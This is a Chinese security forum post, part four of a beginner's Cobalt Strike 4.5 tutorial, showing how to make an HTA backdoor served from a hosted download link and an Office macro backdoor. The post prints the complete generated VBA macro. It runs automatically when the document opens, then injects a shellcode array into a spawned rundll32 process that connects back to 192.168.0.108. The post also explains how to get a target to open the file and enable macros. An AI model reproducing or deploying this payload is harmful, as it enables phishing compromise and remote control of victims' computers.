安全矩阵

 找回密码
 立即注册
搜索
查看: 1005|回复: 0

小白学习Cobalt Strike4.5(四)

[复制链接]

189

主题

191

帖子

903

积分

高级会员

Rank: 4

积分
903
发表于 2022-8-21 22:15:33 | 显示全部楼层 |阅读模式
小白学习Cobalt Strike4.5(四)


​0x01 HTA文档上线

1、点击攻击,选择生成后门,选择HTA文档
编辑
2、点击选择按钮,选择生成的监听器,方法Method选择PowerShell
编辑
3、点击生成,选择要保存的位置,修改一下名字,再点击保存
编辑
4、点击攻击,选择Web钓鱼,选择文件托管
编辑
5、文件选择刚生成的ebilaiyou.hta文件,本地URL随便重命名一下aiyoumm.exe,点击运行
编辑
6、让目标主机访问下面自动生成的地址,即可下载木马,只要对方运行,即可上线
  1. <pre class="cke_widget_element" data-cke-widget-data="%7B%22code%22%3A%22http%3A%2F%2F192.168.0.108%3A80%2Fdownload%2Faiyoumm.exe%22%2C%22classes%22%3Anull%7D" data-cke-widget-keep-attr="0" data-cke-widget-upcasted="1" data-widget="codeSnippet"><code class="hljs">http://192.168.0.108:80/download/aiyoumm.exe</code></pre>
  2. <span class="cke_reset cke_widget_drag_handler_container" style="background: url(" https:="" csdnimg.cn="" release="" blog_editor_html="" release2.1.9="" ckeditor="" plugins="" widget="" images="" handle.png")="" rgba(220,="" 220,="" 0.5);="" top:="" 0px;="" left:="" 0px;"=""></span>
复制代码



编辑
7、
编辑

0x02 宏上线
1、点击攻击,选择生成后门,选择Office宏
编辑
2、选择监听器


编辑

3、点击生成
编辑

  1. Private Type PROCESS_INFORMATION
  2.     hProcess As Long
  3.     hThread As Long
  4.     dwProcessId As Long
  5.     dwThreadId As Long
  6. End Type

  7. Private Type STARTUPINFO
  8.     cb As Long
  9.     lpReserved As String
  10.     lpDesktop As String
  11.     lpTitle As String
  12.     dwX As Long
  13.     dwY As Long
  14.     dwXSize As Long
  15.     dwYSize As Long
  16.     dwXCountChars As Long
  17.     dwYCountChars As Long
  18.     dwFillAttribute As Long
  19.     dwFlags As Long
  20.     wShowWindow As Integer
  21.     cbReserved2 As Integer
  22.     lpReserved2 As Long
  23.     hStdInput As Long
  24.     hStdOutput As Long
  25.     hStdError As Long
  26. End Type

  27. #If VBA7 Then
  28.     Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
  29.     Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
  30.     Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
  31.     Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
  32. #Else
  33.     Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
  34.     Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
  35.     Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
  36.     Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
  37. #End If

  38. Sub Auto_Open()
  39.     Dim myByte As Long, myArray As Variant, offset As Long
  40.     Dim pInfo As PROCESS_INFORMATION
  41.     Dim sInfo As STARTUPINFO
  42.     Dim sNull As String
  43.     Dim sProc As String

  44. #If VBA7 Then
  45.     Dim rwxpage As LongPtr, res As LongPtr
  46. #Else
  47.     Dim rwxpage As Long, res As Long
  48. #End If
  49.     myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1,49,-64,-84,60,97,124,2,44,32,-63,-49, _
  50. 13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1,-48,80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1, _
  51. -42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3,125,-8,59,125,36,117,-30,88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4, _
  52. -117,1,-48,-119,68,36,36,91,91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _
  53. -43,49,-1,87,87,87,87,87,104,58,86,121,-89,-1,-43,-23,-124,0,0,0,91,49,-55,81,81,106,3,81,81,104,-72,34,0,0,83,80,104,87,-119,-97, _
  54. -58,-1,-43,-21,112,91,49,-46,82,104,0,2,64,-124,82,82,82,83,82,80,104,-21,85,46,59,-1,-43,-119,-58,-125,-61,80,49,-1,87,87,106,-1,83,86, _
  55. 104,45,6,24,123,-1,-43,-123,-64,15,-124,-61,1,0,0,49,-1,-123,-10,116,4,-119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119,-63,104,69,33,94,49,-1, _
  56. -43,49,-1,87,106,7,81,86,80,104,-73,87,-32,11,-1,-43,-65,0,47,0,0,57,-57,116,-73,49,-1,-23,-111,1,0,0,-23,-55,1,0,0,-24,-117,-1, _
  57. -1,-1,47,100,86,80,82,0,12,-60,67,-37,105,-90,54,-58,62,18,44,-65,-27,89,-39,98,25,-51,116,-100,63,-127,65,-63,-21,87,-64,107,76,65,103,-46, _
  58. 66,104,23,40,-10,70,20,-54,-94,-91,101,104,38,-50,-99,46,-79,-6,-71,44,104,-59,29,15,119,112,57,-115,80,14,-63,-114,-52,-53,126,92,-37,96,27,-95, _
  59. -98,0,85,115,101,114,45,65,103,101,110,116,58,32,77,111,122,105,108,108,97,47,53,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77, _
  60. 83,73,69,32,49,48,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,50,59,32,87,105,110,54,52,59,32,120,54,52,59,32,84,114, _
  61. 105,100,101,110,116,47,54,46,48,59,32,65,118,97,110,116,32,66,114,111,119,115,101,114,41,13,10,0,120,-61,-99,-95,-30,96,54,-82,-81,-31,-24,-124, _
  62. 118,24,85,57,84,67,123,17,-101,74,6,13,-71,-54,-61,41,-14,53,40,-93,64,113,-13,-113,-35,-109,102,-119,115,-59,9,50,-42,-70,66,38,-123,110,41,37, _
  63. 62,-25,0,-61,60,114,-81,-80,105,118,-7,53,10,-45,-3,35,55,107,-81,-94,-75,5,39,59,-22,33,-92,-126,-86,-82,34,106,65,111,-46,-103,-126,56,-90,77, _
  64. -65,40,47,-38,-115,-30,-43,-62,44,-30,73,-23,-45,120,-92,-125,71,122,-101,-29,123,-49,-17,104,-10,96,-58,-67,31,-86,-40,91,110,86,-67,44,127,-60,-34,-19, _
  65. 10,91,124,-115,-110,-82,-48,53,-86,-92,41,21,15,-33,117,85,58,-95,103,120,83,-55,59,1,23,50,-41,-61,53,-115,11,86,-52,-15,28,71,-39,62,52,28, _
  66. 62,0,58,103,87,-97,-15,87,-103,-108,18,-18,-55,18,-5,-2,116,-67,-127,-58,-69,97,-128,-28,-78,0,104,-16,-75,-94,86,-1,-43,106,64,104,0,16,0,0, _
  67. 104,0,0,64,0,87,104,88,-92,83,-27,-1,-43,-109,-71,0,0,0,0,1,-39,81,83,-119,-25,87,104,0,32,0,0,83,86,104,18,-106,-119,-30,-1,-43, _
  68. -123,-64,116,-58,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,-87,-3,-1,-1,49,57,50,46,49,54,56,46,48,46,49,48,56,0,0,10,44,42)
  69.     If Len(Environ("ProgramW6432")) > 0 Then
  70.         sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
  71.     Else
  72.         sProc = Environ("windir") & "\\System32\\rundll32.exe"
  73.     End If

  74.     res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)

  75.     rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
  76.     For offset = LBound(myArray) To UBound(myArray)
  77.         myByte = myArray(offset)
  78.         res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
  79.     Next offset
  80.     res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
  81. End Sub
  82. Sub AutoOpen()
  83.     Auto_Open
  84. End Sub
  85. Sub Workbook_Open()
  86.     Auto_Open
  87. End Sub
复制代码

4、新建一个DOC文件,随便命名,然后打开,点击文件后面向下的箭头,选择工具,选择宏,再选择宏
编辑
5、宏名随便去,宏的位置,选择我们创建的这个文件,点击创建
编辑

6、将原来的代码删除,然后将上面那些代码复制过去,关闭,重新打开这个doc文件
编辑
7、包含宏,提示是否启用宏,我们点击启用宏


编辑

8、成功上线
编辑

工具下载地址:

关注网络安全者公众号,后台回复CS4.5


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 13:51 , Processed in 0.016746 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表